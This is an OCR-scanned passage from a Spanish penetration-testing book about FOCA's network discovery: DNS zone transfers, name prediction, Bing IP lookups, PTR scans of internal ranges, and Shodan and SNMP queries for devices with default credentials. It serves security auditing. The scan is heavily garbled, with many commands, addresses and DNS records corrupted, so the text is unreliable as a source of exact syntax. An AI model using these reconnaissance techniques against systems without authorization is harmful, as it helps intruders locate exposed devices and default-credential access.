
MX 

10 

ALT1 .  A  S  PM  X .  L.  Google.  COM . 

zonetransfer.me. 

7200 

IN 

MX 

10 

ALT2 .  A  SPMX .  L .  Google.  COM. 

[.■■] 

Image n  03.07:  Transferencia  dc  zona  del  dominio  zo netransfer. me . 


La  implementation  de  la  herramienta  us  lookup  en  GNU/Limtx  no  incorpora  la  orden  Is,  por  lo  que 
los  usuarios  de  este  si  stem  a  pueden  ulilizar  cl  program  a  dig  {Domain  Information  Groper),  Los 
pasos  a  seguir  seran  los  rnismos  que  se  han  mostrado  con  ns  lookup.  Tras  local  izar  los  servidores  de 
nombres  del  dominio  a  auditar  seleecionando  ns  como  el  tipo  de  registro  que  se  desea  consul  tar,  se 
solicita  la  transferencia  de  zona  con  las  opciones  axfr,  utilizando  el  modificador  @  para  indicar  la  IP 
o  el  FQDN del  servidor  DNS  al  que  se  debe  realizar  la  solicitud 

4  dig  asfr  !Sn5l6.zoDMdit.cain  ^netransfer.Die 

zocetransfer  me.  7200  IN  SO  A  Bsl6.zaneesdit.com. 

EoacontactzoBeeditcom.  2013064418  2400  360  1209600  300 
zooetiamfer ,  me.  7200  IN  A  217.147.180.162 

zonetransfer  me.  7200  EM  MX  0  ASFMX.L. GOOGLE. COM. 

I  ■] 

Imagen  03.08:  Solicilar  una  transferencia  do  zona  con  dig. 


La  information  obtcnida  por  FOCA  en  una  transferencia  de  zona  puede  resultar  de  gran  ayuda  para 
d  exito  posterior  de  una  auditorja.  En  ocasiones  los  adniinistradores  de  los  servidores  de  nombres 
no  tienen  la  sensation  de  que  la  informacion  almacenada  en  el  rnapa  de  dominio  pueda  ofrecer 
datos  sign ificati vos  a  un  potential  atacante,  pero  lo  cierto  es  que,  aunquc  todos  los  registros  sean 
de  maquinas  publicas  y  no  revelen  el  direccionamiento  intemo  de  la  comparha,  suele  ser  habitual 
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dcscubrir  datos  muy  interesantes  que  podrian  ser  la  base  para  otras  fases  de  un  test  de  intrusion.  A 
continuacion  se  muestran  varies  ejemplos  obtenidos  del  mapa  de  dominie  de  zonetransfer.me  que 
ponen  de  manifesto  el  tipo  de  informacion  que  puede  inferirse  de  mi  analisis  de  los  registros  de  un 
dominio.  En  la  web  del  propio  proyecto3  pueden  encontrarse  una  mayor  eanlidad  de  ejemplos  y  una 
deseripcidn  mas  detallada  de  los  mismos. 

-  Los  registros  MX  obtenidos  con  la  transferencia  niostrados  en  la  imagen  03.07  indican 
que  los  servidores  a  los  que  el  email  debe  ser  enviado  son  los  servidores  de  correo  de  Google, 
por  lo  que  se  deduce  que  la  compania  usa  Gmail  o  Google  Apps  para  la  gestion  de  su  correo 
electronico. 

-  Los  registros  LOG  (LOCation)  se  utilizan  para  almacenar  informacion  sobre  la  longitud y 
latitud  de  un  host,  y  los  valores  se  guardan  en  grades,  minutos  y  segundos.  Esta  informacion 
es  evidentemente  muy  interesante,  ya  que,  por  una  parte,  podrian  obtenerse  ioiagenes  de 
la  situacion  de  los  data  centers  de  la  compania  y  fotografias  de  los  edificios  donde  estan 
alojados  y,  por  otro  lado,  hace  posible  preparar  el  timing  de  la  fase  de  explotacion  de  un  test 
de  forma  mas  eficiente,  haeiendo  que  el  ataque  coincida  con  un  fin  de  semana,  por  ejemplo, 

dr. zonetransfer. me .  300  IN  LOC  53  20  56.557  N  1  38  33.525  W  0.00m  Im 

IQQOOm  10m _ 

Images  03.09:  Registro  LOC. 

Los  registros  Txt  almacenan  informacion  de  texto  y  siempre  deben  ser  comprobados  por 
el  pent  ester,  ya  que  suelen  contener  datos  muy  valiosos.  Por  ejemplo,  el  primer  registro 
mostrado  a  continuacion  informa  de  que  e  l  sitio  lia  si  do  verificado  para  ser  utilizado  en  una 
cuenta  de  Google  App,  mlentras  que  el  segundo  registro  es  el  meeanismo  que  usa  GoDaddy 
para  comprobar  que  quien  solicita  un  certificado  SSL  es  realmente  el  duefio  del  dominio. 

I  zonetransfer.me.  301  IN  Txt  “Google- site- 
verilic ation^ty  P28  J7  J AUH A9fw2 sHXMgcCC 01 6XBmmo Vi04 V I  Me w x  A” 

dzc.  zonetransfer.  me,  7200  IN  Txt  “AbCdEfG” 


Imagen  03.10:  Registros  Txt. 


En  oeasiones  tambien  pueden  local  izarse  otros  sitios  alojados  en  el  mismo  servidor  que  el 
sitio  web  principal  y  que  puede  que  se  encuentren  menus  protegidos  por  tratarse,  por  ejemplo, 
de  un  sitio  de  pruebas,  lo  que  lo  converting  un  mejor  vector  de  ataque. 

testing.zonetransfer.me,  301  IN  CNAME  www.zonetransfcr.me. 

Imagen  03. 1 1 :  Registro  CNAME . 

-  Y,  por  ultimo,  los  registros  i57?F  identifican  servicios  y  almacenan  et  ptotocolo,  equipo  y 
puerto  en  e!  que  se  ej  ecu  tan,  por  lo  que  pueden  util  izarse  para  descubrii  roles  de  los  servidores. 

sip,  tep.  zone  transfer,  me.  14000  IN  SRV  0  0  5060  www.zonetransfer.me. 

Tmagen  03 . 1 2:  Registro  SR  V . 


3  HTTP  // w  w  w.d  i  g  i  rt  i  nj  a .  o  rg/pr oj  ects/zon  etran  sferm  e .  PHP 
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Ademas  de  poder  activar  o  desactivar  todas  estas  funcionalidades  en  la  seccion  Network  de  FOCA, 
en  las  opciones  del  programs  en  la  pestana  con  el  titulo  de  DNS  Search,  es  posible  personalizar  el 
numero  de  servidores  DNS  que  se  van  a  consultar  para  cada  una  de  las  consultus,  la  recursividad 
maxima  que  se  seguira  aplicando  el  algoritmo  voraz  de  busqueday  la  cantidad  de  consul  tas  pa  rat  el  as. 


fmagen  U3.I3:  Configuracion  de  las  busquedas  DNS, 

La  primera  opcion  permits  escoger  a  I  usuario  si  se  desea  utilizar  un  unico  servidor  DNS  de  los 
localizados  para  el  dominio  objetivo  o  si,  por  el  contrario,  prefiere  que  se  consul  ten  todos  los  que 
hay  an  sido  encontrados.  Marcar  esta  pestana  es  habitual  mente  redundanle  y  hace  que  se  ralentice 
el  procesamiento,  pero  en  ocasiones  puede  resultar  interesante.  Por  ejemplo,  es  posible  encontrar 
dominios  en  los  que  las  transferences  de  zona  solo  es  posible  realizartas  sobre  uno  de  los  servidores 
de  nombres. 

Cuando  FOCA  encuentra  un  nuevo  dominio  o  una  nueva  direccion  IP,  el  programa  trata  de  realizar 
una  resolucion  directa  o  in  versa,  respectivamente,  con  el  objetivo  de  localizar  mas  direcciones  y 
dominios.  Esta  tare  a  recurs  iva  suele  producir  pocos  resultados  positives,  por  lo  que  se  recomienda 
escoger  un  valor  de  3  como  maxi  mo  en  esta  opcion  y  lo  recomendable  seria  utilizar  el  valor  por 
defecto  2,  que  es  el  que  mejor  balance  entre  tiempo  y  resultados  ofrece  al  proceso. 

Y,  por  ultimo,  el  usuario  puede  escoger  el  numero  de  consultas  a  realizar  de  forma  paralela  de 
manera  que  esta  parte  del  algoritmo  se  acelere,  donde  un  valor  0  indica  al  programa  que  no  se 
establece  n ingun  Urnite.  En  la  version  Free  de  FOCA  esta  opcion  se  encuentra  deshabilitada  y  el 
valor  establecido  por  el  programa  es  1 , 
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DNS  Prediction 

Una  de  las  opciones  de  anal  is  is  de  I  os  servicios  DNS  que  no  esta  en  modo  autonmtico  es  la 
prediction  de  servidores  en  base  al  nombre  de  algun  servidor.  El  objetivo  es  poder  predecir  nombres 
de  servidores  cuando  se  detecta  un  patron  en  la  forma  de  nombrarlos,  es  decir,  por  ejemplo  aparece 
un  servidor  que  se  llama  FileServerL  En  ese  entomo  seria  mas  que  sensaio  pensar  que  podria  existir 
un  servidor  llamado  FileServer2  o  FileServer3,  por  lo  que  merece  la  pena  tratar  de  localizarlos. 

Para  poder  realizar  esta  prediction,  FOCA  viene  eon  una  herramienta  que  genera  todas  la 
combinaciones  de  nombres  en  base  a  variables  nunierieas  y  variables  alfanumericas  que  pueden 
recorrer  el  alfabeto.  Se  selecciona  la  herramienta  de  DNS  Prediction  haeiendo  die  con  el  boton 
derecho  del  raton  sobre  el  servidor  que  se  quiere  usar  de  base  para  ia  prediction.  Una  vez  seleccionada 
la  accion,  aparecera  un  euadro  de  dialogo  donde  se  configuran  todas  las  posibles  predicciones  de 
nombre  a  probar. 


lmagen  03.14:  Configuration  de  prediccion  DNS. 


Entre  corchetes  se  definen  las  variables,  se  elige  su  position  y  se  determ  ina  donde  van  dentro  del 
nombre  base.  FOCA  realizara  todas  las  peticiones  y  dara  de  alta  en  la  vista  de  servidores  todos  los 
nuevos  servidores  que  hayan  side  descubiertos. 

0  Servers 

S  -#?  ecf.mdd.uscourts.gov  [207.41. 1G.93] 


wwwl.usal.es  [212.128.129.17] 


|  -  ^j  'www2  usal.es  1212.128.129.43] 
'www3.usal.es  [212.128  129.120] 
jl  ftp1.usal  .es  [212.128.130.49] 


lmagen  03d  5:  Servidores  descubiertos  por  DNS  Prediction. 
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Bing  IP 

Hoy  en  dia  es  muy  habitual  que  im  servidor  web  se  encuentre  en  un  entorno  de  hosting  compartido, 
lo  que  signifies  que  compart e  la  infraestruclura  del  servidor  eon  otros  dominion  La  tecnologia  de 
virtual  hosts  es  la  que  permite  que  im  servidor  web  pueda  alojar  al  mismo  tiempo  varies  silios  web , 
asociando  multiples  n ombres  de  dominio  a  una  misma  direccion  IP.  Bs  por  ello  que  una  de  las 
eabeceras  obligatorias  en  las  peticiones  HTTP  es  la  cabecera  host s  que  indica  el  nombre  del  sitio 
sabre  el  que  el  cliente  esta  solicitando  un  determinado  recurso,  de  forma  que  el  servidor  web  pueda 
saber  a  qud  sitio  web  de  los  alojados  en  esa  IP  debe  dirigir  la  pet  i  cion. 

Hay  nrmchos  mecanismos  para  descubrir  los  virtual  hosts  relaeionados  eon  un  servidor  analizado, 
aunque  quizas  una  de  las  mayores  base  de  datos  que  existen  para  realizar  este  lipo  de  consultas  es 
la  que  manliene  el  buscador  Bing,  que  mediante  el  operador  IP.X.X.X.X  permite  obtener  la  lista 
de  tod  os  los  sitios  Index  ados  por  Bing  en  esa  misma  direccion  IP,  ya  sea  porque  estan  alojados  en 
el  mismo  servidor  o  porque  estan  detras  de  la  misma  direccion  IP  publica  tras  un  Perverse  Proxy. 

Por  cada  nueva  direccion  IP  descubierta  en  la  fuse  de  analisis  de  red,  FOCA  realizara  una  consul ta  a 
Bing  para  tratar  de  encontrar  nuevos  nombres  de  dominio  asociados  a  esa  direccion  IP.  Si  el  nombre 
del  hosts  deseubierto  a  traves  de  esta  consul  ta  esta  en  el  dominio  principal  del  proyecto  de  analisis, 
entonces  se  volvera  a  realizar  todo  el  trabajo  recursivamente,  es  decir,  se  volvera  a  resolver  su 
direccion  IP  para  comprobar  si  se  obtiene  una  diferente.  Si  es  asi,  se  volvera  a  realizar  el  proceso  de 
PTR  Scanning ,  descrito  en  la  siguiente  seccion,  y  de  Bing  IP.  Puede  observarse  este  proceso  en  la 
figura  03.16,  en  la  que  se  muestran  algunos  de  los  dominios  descubiertos  por  FOCA  en  una  direccion 
IP  analizada. 

Ddidoiits  in  IP  'Jource 

etmmdo.es 

dmmski.es 

VSO.BS 

WMW.mgandovsiv.  coin 
pjgandovoy  com 
mwf.ockileauas  com 
oc^ideauas  com 
win  marca  com 

msca  oofi'i 
WNWOKpenEiar..  com 
«wpan  set-,  com 
WWW.Wv&cani 
SaK&com 
viww.tiamilo5.net 

linagen  03.16:  Dominios  alojados  en  la  Tnisma  direccion  IP. 


Han  domain  [ebumte  et] 

Main  domain  [elfMjndc. as]  i  DNS  resolution  [193.11CL120.199[  >  DNS  rmrarse  icsdutan  [wwW. ehwndc. e*] 

Main  domain  [eknLndo. 03]  >  DNS  resolution  [193.110 12&.199]  >  Bina  IP  Sft^ir^si  [vwiw  veo.es] 

Main  domain  [elmcnda  Ci]  >  DNS  resolution  1193.110.1231159]  >  Bing  I P  Search  [www.vao.0s]  J>  Intasod  by  wwr.VBO.es  [veo,  es] 

Mdn  domain  [eltnJ'tJo  es]  >  DNS  resolution  J193.1 1  □  123.1 99j  >  Bing  iP  5aarch  [mwn, iugandovov.com] 

Man  donafc  [ofamta  es]  >  DH5  reaotulion  ]133.1 1  D.12&1 99]  >  Bing  IP  Scorch  [vwfw.iugandaYtjy.com]  >  Meied  bv  im*w  jugandovoy.com  [jugarety/oy. com| 
Has’-  domain  Jelmuvdo  ea]  >  DNS  sesotubon  J1 33. T T  13.1 29. 1 99]  >  Bing  IP  Scorch  [(wwr.odrdcguos  tom] 

Man  domsr  [etrnr jndc.es]  >  DNS  lesdutaon.  jl 93. 1 1 0.1 2S.  1 99]  >  Bing  IP  Scorch  [wiw.ocheieou^s  com]  >  leered  by  iMNW.ocftotaguas.  com  [ochoteguos  com] 
M  an  domrar,  |etmundo.es:|  >  DNS  lesotutron  |1 93t  1 1 0.1 29  1  99]  >  Bing  IP  Scorch  [ynMa.fftaroa.com] 

Mon  domon  |dnnundo  osl  >  DNS  isdutxri  [133 110  123 133]  >  Bing  IP  Search  [wNwr.mafca.com]  >  Infetcd  by  wvwr.mofco.ocm  [hioiCtS  tom| 

M  ain  domon  [dmundo  esl  >  D  NS  leKiition  [1 93 1 1  □.  1 2E 1 93]  >  Eng  IP  Eeaech.  jwvwr.  expansion. com] 

Man  daman  [aimundo.es|  >  DNS  resokiticn  [193.110.1 26.1 99]  >  Bhg  IP  Scoch Iwiwi expansion  com]  ?  Inlered  by  wvwr.eKpansion.com  ] a ^answn com | 
Mam  demon  [etnundo.esl  >  DNS  iBscfcition  [133 1101 28 139]  >  Bnfl  IP  Seoich]www.telva.ccmi] 

Main  domain  [ofcwriCkr.es]  >  DNS  tesoUkn  [IS?  110 1 2B 1991]  >  Bng  IP  Search  [www. tetva.com]  >  Haisd  by  www  tetVo.  com  [telva  tom] 

Main  tismaki  [eknundo.esS  >  DN  E  resolution  [1 93.1 1 OL 1 20. 1 99] B  ng  IP  S  carch  | w w w.  bromSos  net] 


Esta  parte  del  algoritmo  puede  bloquear  el  analisis  total  del  proyecto  debido  a  que  se  de  con  un 
servidor  de  hosting  eon  miles  de  dominios  asociados.  Para  evitar  estas  si tuac tones  FOCA  cuenta  con 
el  hoton  Skip  en  el  DNS  Search  Panel,  que  fuerza  al  algoritmo  a  pasar  al  siguiente  paso. 

En  un  proceso  de  auditoria  de  un  servidor  web  esta  leenica  puede  resultar  muy  util  para  localizar 
mejores  vectores  de  ataque.  Tras  realizar  las  primeras  fases  del  test,  recopilacibn  de  informaclon  y 
busqueda  de  vulnerabil  id  ade  s ,  es  posible  que  el  auditor  no  hay  a  sidocapazde  encontrar  una  fisura 
en  la  seguridad  del  ser\  idor,  por  tratarse  de  un  recurso  critico  para  la  empresa.  Sin  embargo,  al 
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utilizar  un  hosting  compartido,  puede  existir  la  posibilidad  de  que  alguno  de  los  sitios  que  comparten 
hosting  con  el  servidor  auditado  pre  sente  alguna  VulnerabOidad  que  el  pen  tester  pueda  explotar, 
permitiendoLe  asi  acceder  al  equipo  objetivo  a  traves  de  este  olro  sitio  vulnerable. 


PTR  Scanning 

Otra  de  las  pruebas  que  realiza  FOCA  dentro  de  la  fase  de  descubrimiento  de  la  red  de  la  organ izacion 
es  un  proceso  de  escaneo  de  los  servidores  DNS  bus  can  do  los  registro  Pointer  o  PTR.  Los  registros 
Pointer  o  “punteros”,  identifieados  como  registros  de  tipo  PTR  dentro  de  la  base  de  datos  de  un 
servidor  DNS,  se  utilizan  para  realizar  lo  que  se  conoeen  como  resoluciones  DNS  inversas,  Aunque 
las  operaeiones  DNS  mas  habituates  son  las  consultas  direetas,  en  las  que  $e  obtiene  la  direeeion  IP 
de  un  equipo  a  partir  de  su  nombre,  exislen  ocasiones  en  las  que  se  neeesita  realizar  la  operacidn 
opuesta,  es  deeir,  eneontrar  el  nombre  de  un  equipo  partiendo  de  su  direeeion  IP  previamente 
conocida. 

Este  proceso  es  identificado  como  resolucion  inversa  y  es  utilizado  por  diferentes  servicios  como, 
por  ejemplo,  cuando  los  servidores  de  correo  tratan  de  verificar  que  un  e-mail  ha  sido  enviado 
desde  un  determinado  dominie  verificando  que  la  direeeion  IP  de  entrega  pertenece  a  nombre  de  un 
servidor  en  el  dominio  del  remitente,  y  para  ello  se  consulta  su  registro  PTR  en  Internet. 

Con  el  objetivo  de  eneontrar  mas  servidores  en  el  mismo  segmento  interno  de  la  red  donde  existan 
uno  o  mas  servidores  que  FOCA  haya  localizado  previamente  mediante  el  uso  de  otras  tecnicas  de 
analisis  de  red  o  simplemente  por  medio  del  analisis  de  metadatas,  el  programa  realizara  un  escaneo 
de  registros  PTR  por  todo  el  rango  de  direcciones  descubierto,  lanzando  consultas  a  registros  PTR  del 
DNS  de  todas  las  posibles  direcciones  IP  pertenecientes  a  todos  los  segmentos  de  red  previamente 
descublertos. 

Es  deeir,  supongamos  que,  por  ejemplo,  por  medio  de  un  proceso  de  analisis  de  metadatas  se  ha 
localizado  la  direeeion  IP  192. 168.23  A  A  partir  de  ese  dato,  FOCA  se  eoneetara  a  uno  de  los 
servidores  DNS  de  la  organization  que  se  esta  analizando,  o  a  todos  el  los,  dependiendo  de  la 
eonfiguracion  de  las  opciones  de  DNS  que  se  hayan  estahlecido,  y  pregun  tara  por  el  registro  PTR 
asoeiado  a  todas  y  cada  una  de  las  direcciones  JP  que  van  desde  la  192.168.23.1  a  la  192.168.23.255. 

Este  proceso  se  realizara  por  todos  y  cada  uno  los  segmentos  de  red  en  los  que  se  haya  descu  bierto 
de  fonna  automatica  al  menos  una  direction  IP  de  un  servidor,  y  si  esta  es  interna  podra  Ilevar  al 
descubrimiento  complete  de  la  red  de  la  organizacion.  Este  proceso  tambien  se  puede  hacer  de  forma 
manual  con  la  opcion  del  menu  contextual  que  hay  sobre  cada  segmento  de  red,  y  las  direcciones  IP 
tambien  pueden  ser  anadidas  manualmente  para  eomenzar  este  proceso  de  escaneo, 

Para  entender  este  proceso  interne,  se  puede  realizar  este  escaneo  de  forma  manual  utilizando  de 
nuevo  el  programa  desde  el  interfaz  de  comando  ns  lookup.  Para  ello  hay  que  local  izar  en  primer 
lugar  todos  los  servidores  de  nombres  del  dominio  analizado  en  cada  caso,  pidiendo  para  ello  los 
registros  de  tipo  NS  pertenecientes  a  la  organizacion  objetivo  del  analisis,  tal  y  como  se  puede  ver 
en  el  siguiente  proceso  descrito  en  la  imagen  de  la  pagina  siguiente. 
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>  nslookup 

>  set  type=ns 

>  urjc.es 

N on- authoritati vc  answer; 

urj  c .  e  s  n  ame  server  =  sun  .rcdi  ri  s .  e  s . 

urj  c .  es  n  ameserver  =  ch  i  co .  redi  ris.es. 

u  rj  c .  cs  n  ameserv  er  =  ori  on ,  urj  e .  es . 

urjc.es  nameserver  =  titan. urje.es. 

urjc.es  nameserver  =  deimos.urjc.es. 

uijc.es  nameserver  =  cibeles.urjc.es. 

urjc.es  nameserver  =  neptuno.urjc.es. 

urjc.es  nameserver  =  satumo.uijc.es. 

Authoritative  answers  can  be  found  from: 

chico.rediris.es  internet  address  =  130.206.1.3 

chico .  rediri  s.  es  h  as  A  A  A  A  addre  ss  200 1 : 7 20 : 4 1 8 :  c  ail : :  3 

sun.rediris.es  internet  address  =  1 30,206. 1 .2 

Irnagen  03. 1 7:  Oblener  servidores  DNS  con  ns  lookup, 

A  conti  nuac  ion  debe  eonhgurarse  el  program  a  para  que  las  consultas  se  realicen  contra  uno  de 
los  servldores  DNS  obtenidos,  En  un  proceso  do  audkoria  complete  deberia  realizarse  el  mismo 
proceso  contra  todos.  Hay  que  tener  en  cuenta  que  general  men  te  la  zona  de  registros  PTR  no  sc 
suele  sincronizar  con  los  registros  DNS  secondaries  ast  que  si  se  localiza,  lo  habitual  es  que  este  en 
el  Primary  Name  Server  o  en  uno  solo  de  los  servidores  publicados. 

Una  vez  conectados  al  servidor  DNS  de  la  organizacion  que  se  va  a  analizar,  se  debe  modificar  el 
tipo  de  registros  que  se  quieren  consultar  a  tipo  Pointer,  seleccionando  para  el  lo  el  tipo  PTR  con  la 
orden  set  type-PTR. 

Una  vez  realizados  estos  pasos,  el  escaneo  es  tan  sencillo  conio  preguntar  por  todas  y  cada  una  de 
las  direcciones  IP  intemas  de  la  red  en  cada  uno  de  los  segment  os  descubiertos  previamente  -  o 
simplemente  supueslos  obteniendo  o  bien  un  mensaje  de  error,  lo  que  indica  que  no  hay  ningun 
registro  PTR  asociado  a  esa  d ire c cion  IP,  o  bien  el  nombre  FQDN  de  la  maquina  con  esa  direccion. 
con  el  formato  de  registro  inverse,  es  decir,  direccion  IP  invertida  con  el  dominio  in-addr.arpa. 
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>  server  ncptuno.urjc.es 

De  fau !  t  server:  n  ep  t uno.  uij  c .  es 
Address:  193.147.184,2#53 

>  set  typn=PTR 
>192.168.46.21 
Server:  neptuno.uijc.es 
A  dress:  193.147,184-2 

21, 46,168.192 Jn-addr,arpa  name=  morgana.urjc.es 

Imagen  03.18:  Realizar  consultas  PTR  de  direcciones  IP  internas. 


En  las  opciones  de  FOCA ,  en  la  pestana  General  config,  puede  marearse  o  desmarcarse  la  casilla 
Scan  only  net  ranges ! 24  (X.X.X.0-255),  que  indica  al  programa  si  deben  escanearse  tod  os  los  rangos 
de  red  o  solamente  aquellos  de  clase  C.  Debe  tenerse  en  cuenta  que  si  FOCA  localize  por  ejemplo, 
un  dominio  de  clase  A  (con  un  mascara  /So  255.0.0.0)  y  esta  opcion  no  se  encuentra  seleccionada, 
el  programa  realizara  1 6.777.2 1 6  de  peticiones,  lo  que  puede  ralentizar  el  proeesamiento. 


Shodan 

Shodan*  es  un  buscador  que  permite  realizar  busquedas  basadas  en  equipos  para  acceder  a  gran 
cantidad  de  information  sobre  dispositivos  conectados  a  Internet  en  funcion  de  su  eiudad,  pals,  latitud 
o  longitud,  n  ombre  de  equipo,  sistema  operativo  o  direction  IP.  A I  contrario  de  como  funcionan 
los  buscador  es  tradicionales,  las  aranas  de  Shodan  no  Index  an  documentos,  si  no  que  rastrean  las 
cabeceras  HTTP,  FTP ,  SSH,  SMTP  y  SIP  de  los  equipos  que  local  izan.  Como  lo  que  Shodan  index  a 
es  la  informacion  devuelta  por  los  diferentes  dispositivos  ante  una  conexion  a  un  puerto,  es  posible 
realizar  busquedas  sobre  servidores,  routers,  puntos  de  aeceso,  camaras  IP,  turbinas  eolicas,  plantas 
dc  energia,  lelefonos  VoIP  o  sobre  cualquier  otro  equipo  coneetado  a  Internet. 

Para  mostrar  el  funcionamiento  de  Shodan  y  la  sencillez  de  su  sintaxis  se  van  a  plantear  algunos 
ejemplos  de  busquedas  que  se  encuentran  entre  las  mas  populates  de  las  que  realiza  la  comunidad  de 
usuarios  y  que  pueden  ser  ej  ecu  l  ad  as  desde  el  propio  director!  o  de  busquedas  del  sitio- : 

nefcam  — >  localiza  camaras  IP  que  incluyen  la  palabra  n  etc  am  en  el  banner  Index ado  por 
Shodan. 

il default  password"  — >  dispositivos  en  que  incluyen  la  expresion  default  password  en  el 
banner \  por  lo  que  es  posible  que  el  usuario  y  contrasena  por  defecto  sean  validos. 

“ClSCO-tos”  “last- modified”  —>  equipamiento  CISCO  que  parece  que  no  requiere 
ningun  tipo  de  autenticacion. 


4  HTTP ://w w w.  sliodanh  q.cntn/ 

5  HTTP: // w w w. shodanhq. co rn/bro wse 
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-  stum?  embedded  — >  Telefonos  VOIP  Snom  que,  aunque  se  encuentran  protegidos  por 
usuario  y  contra  sen  a,  muchos  mantienen  las  creden  dales  de  fabric  a. 

-  scada  —*  busqueda  de  sistemas  SC  AD  A . 

Los  operadores  disponibles  en  Shodan  tambien  son  muy  simples  e  intuitivos,  como  hostname  7 
server ,  os ,  city ,  country,  before  o  after ;  Por  ejemplo,  supongamos  que  un  pen  tester  esta  colabor  ando 
con  el  Ministerio  de  Fomento  dc  Espana  realizando  una  auditoria  de  sus  servidores  web .  Podria 
utilizarse  la  cadena  de  busqueda  ^hostname:  fomento.es  IIS’ "  para  localizar  servidores  web  Internet 
Information  Sendees  de  este  dominio  y  tratar  de  realizar  pruebas  en  los  servidores  para  com  probar 
si  presenlan  alguna  vulnerabilidad  conocida  para  cada  version  de  IIS  localizada, 

Desde  el  punto  de  vista  de  FOCA  y  del  d  esc  u  brim  lento  de  la  red,  uno  de  los  operadores  mas 
interesantes  es  NET:  (es  necesario  estar  logueado  en  Shodan  para  utilizar  este  eomando),  eon  el  que 
es  posible  buscar  informacion  de  una  determinada  direccion  IP  o  de  todo  un  segmento  de  red  si  se 
anade  la  mascara  de  red  en  formate  Cl  DR  cn  la  consults. 

Entre  la  informacion  que  Shodan  muestra  de  cada  equipo  puede  encontrarse  la  fecha  en  la  que  el 
servicio  localize  este  equipo  por  primera  vez,  su  pais,  su  nombre  de  host 9  su  sistema  operative* 
servicios  ofrecidos  y  las  vers i ones  de  las  aplicaciones, 

SHODAN 

Computer  Search  Engine 

'j  Save  this  search 

Results  1-1  of  about  1  for  net:143,84, 

»  Top  con ntries  matching  you  r  search  United  States 

143,84*68.8 

NetApp  Data  OnTap  6.x 

Added  an  27  11.  M3  9 

HTTP/1.0  2®d  OK 
Content -Lengths  507367 

Mia:  1.1  RIL-CTNOSC  (NetCache  Netflpp/6.0.2P11 
X-pouered-by:  0SP.NET 
X-aspnet-ver* Lon:  2,0.50727 
Server?  Miorosoft-II5z6.@ 

Cache-control:  private 
Date:  Fri,  27  Nov  2009  96:49:36  GMT 
Con tent -types  teut/htnl;  charset=utf-8 


Imagen  03.19:  Busqueda  por  segmento  de  red  en  Shodan. 
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En  virtud  a  un  acuerdo  con  el  creador  de  Shodan,  FOCA  hace  uso  de  este  servicio  web  mediante  la 
API  para  desarrolladores  que  ofrece  este  servicio,  y,  por  cada  direccion  IP  descubierta  durante  otras 
fases  del  proeeso  de  descubrimiento  de  red,  el  programa  consulta  a  Shodan  Loda  la  informacidn 
que  este  tiene  Index ada  sobre  esa  detemninada  direccion  IP.  Para  este  proeeso  Shodan  permite  el 
envio  de  los  datos  en  codificados  en  JSON  (Javascript  Object  Notation)  un  formato  ligero  para  el 
intercambio  de  informacion,  por  lo  que  es  perfeeto  para  Index ar  los  resultados  de  forma  may  rapida 
en  FOCA. 

La  inlbrmacibn  a  la  que  es  posible  acceder  a  traves  de  Shodan  proviene  de  haber  realizado  un 
escaneo  de  Internet  completo  de  analizando  much  os  puertos  de  lodas  las  direcciones  expuestas 
en  Internet,  lo  que  puede  resultar  may  iiitercsante  durante  un  test  de  intrusion  al  ofrecer  datos  de 
servicios  SNMP,  HTTP,  FTP ,  SNMP,  HTTPS,  etcetera. 

En  un  proeeso  completo  de  analisis  puede  ser  important©  revisar  los  banner s  completos  que  se 
recibieron  desde  Shodan  -  ya  que  la  informacion  es  filtrada  antes  de  pintar  el  mapa  de  la  red,  pero 
si  hay  informacion  obtenida  desde  Shodan ,  FOCA  la  almaeena  en  cada  imo  de  los  servidores  del 
dominio  auditado  y  puede  ser  obtenido  el  lichero  JSON  desde  alii. 

Descubrimiento  de  la  red  mediante  agentes  SNMP 

Con  el  objetivo  de  poner  de  manifiesto  lo  decisivo  que  puede  resultar  csta  informacion  de  cara 
al  exito  de  una  auditona  se  va  a  plantear  un  ejemplo  del  Lipo  de  datos  a  los  que  se  podria  llegar  a 
acceder  tras  descubrir  con  Shodan  un  dispositive  CISCO  eon  un  agente  SNMP  active. 

Encontrar  estos  disposithos  en  Shodan  resulta  realmente  sencillo.  Para  ello  es  sufic  iente  con  buscar 
el  banner  de  los  dispositivos  CISCO  que  quieran  descubrirse  (como,  por  ejemplo,  “ Copyright  (c) 
1986-2001  by  CISCO  Systems ,  Incej  y  filtrar  por  el  puerto  161.  De  esta  forma  es  posible  acceder 
a  una  buena  eantidad  de  agentes  SNMP  esperando  recibir  consultas  y  la  gran  mayoria  sin  requerir 
ninguna password,  ya  que  se  encuentran  configurados  con  SNMPvJ  o  SNMPv2  y  con  las  comunidades 
public  y private  por  defecto.  Durante  una  auditoria,  por  supuesto,  se  limitaria  tambien  la  busqueda 
utilizando  el  operador  NET  para  restringir  la  consulta  a  la  red  del  dominio  en  cuestion. 

Para  llevar  a  cabo  las  pruebas,  aunque  es  posible  realizar  consultas  SNMP  mediante  diferentes 
elientes  de  linea  de  ordenes,  resulta  mas  comodo  y  send  No  utilizar  algun  visot  de  consultas  SNMP 
como,  por  ejemplo,  MIB  Browser A  La  configuracion  del  programa  es  muy  rapida,  ya  que  tan  solo 
hay  que  indiear  la  direccion  IP  del  dispositivo  a  consultary  escoger  la  version  2  del  protocolo  SNMP 
sin  autenticacion. 

La  informacion  que  se  puede  obtener  mediante  estas  consultas  es  realmente  jugosa,  ya  que  describe 
con  una  gran  exactitud  el  entomo  donde  esta  conectado  ese  equipo.  Aunque  los  datos  a  los  que  se 
podra  acceder  de  pen  den  del  numero  de  MIBs  (Management  Information  Base)  configuradas  en  cada 
dispositivo,  el  arbol  del  panel  izquierdo  del  programa  permite  navegar  por  las  estnieturas  de  datos 
que  pueden  consultarse  de  forma  muy  comoda  y  rapida. 


6  HTTP:  // ire  as  on  i  n  g  .co  m/m  i  bbro  w  scr. s HTML 
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I  magen  03.20:  Consul tas  SNMP  rcalizadas  con  MLB  Browser. 


Los  atributos  que  tienen  el  icono  de  una  tab  la  son  datos  en  formato  de  tabJa  que  pueden  ser 
deseargados  masivamente  con  ima  opcion  del  boton  derecho  Table  View  (que  se  traduce  a  una 
consul  ta  get  table  de  SNMP).  El  resto  de  i  cohos  represen  la  el  tipo  de  da  to  que  se  almacena  en  ese 
atributo  y,  seleccionando  eada  elemento,  en  el  reeuadro  interior  izquierdo  se  puede  acceder  a  una 
descripcion  del  contenido  mas  detallada. 

En  la  i  magen  03.20  se  puede  observar  el  atributo  Physical  Address  de  la  Address  Translation  Table 
que  recoge  la  direccion  MAC  y  la  direction  IP  que  este  si  sterna  ha  almacenado.  Es  una  especie  de 
